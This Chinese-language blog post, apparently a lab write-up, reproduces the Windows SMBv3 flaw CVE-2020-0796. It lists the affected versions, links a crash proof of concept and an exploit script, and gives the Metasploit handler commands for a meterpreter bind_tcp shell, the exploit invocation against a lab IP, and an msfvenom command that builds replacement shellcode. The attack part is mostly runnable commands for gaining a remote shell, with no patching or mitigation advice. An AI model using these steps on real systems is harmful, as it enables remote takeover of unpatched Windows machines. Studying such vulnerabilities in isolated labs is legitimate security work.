CVE-2020-0796微软 SMBv3协议漏洞复现

这个漏洞出来好几天了,其实周五(6.5)那天我就已经复现了,不过有工作要忙,就没写,后来昨天周六搞一个项目又忘记写了,今天又到了交作业的最后一天,就赶紧补上。

0x01漏洞介绍:

该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。(永恒之黑?)

0x02 影响版本

  • 适用于32位系统的Windows 10版本1903
  • Windows 10 1903版(用于基于x64的系统)
  • Windows 10 1903版(用于基于ARM64的系统)
  • Windows Server 1903版(服务器核心安装)
  • 适用于32位系统的Windows 10版本1909
  • Windows 10版本1909(用于基于x64的系统)
  • Windows 10 1909版(用于基于ARM64的系统)
  • Windows Server版本1909(服务器核心安装)

0x03 复现前提:

(1)  目标机器Windows版本为之前提到中的影响版本

例如:

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|

(2)  目标机器防火墙已经关闭

(3)  网络类型为【专用】网络。

(4)  目标机器的安全防御软件已经关闭(火绒、360等)。

0x04 漏洞复现

目标机器(win10)

ip:192.168.159.140

攻击机器(kali)

ip:192.168.159.138

首先测试蓝屏POC

https://github.com/eerykitty/CVE-2020-0796-PoC

注意使用python3执行

kali执行脚本,这边一执行Python脚本,目标机器马上就会蓝屏,所以执行个8s左右就可以关闭该脚本了。

目标机器成功蓝屏

下面就是重点,漏洞POC测试:

(1)  开启msf监控

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 3333

set rhost 192.168.159.140

run

(2)  开始POC脚本(该脚本默认设置3333端口)

https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796

python3 exploit.py -ip 192.168.159.140

(3)  成功获取目标机器shell


注意点:

我所用的POC脚本指定了port为3333端口,所以msf也必须要监听3333端口,如果你想要使用指定其他端口的话。可以用使用msf生成其他端口的shellcode

例如指定4444端口:

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt

然后将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD保存即可。

Refer:

https://www.t00ls.net/articles-56631.html

安全圈复现

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注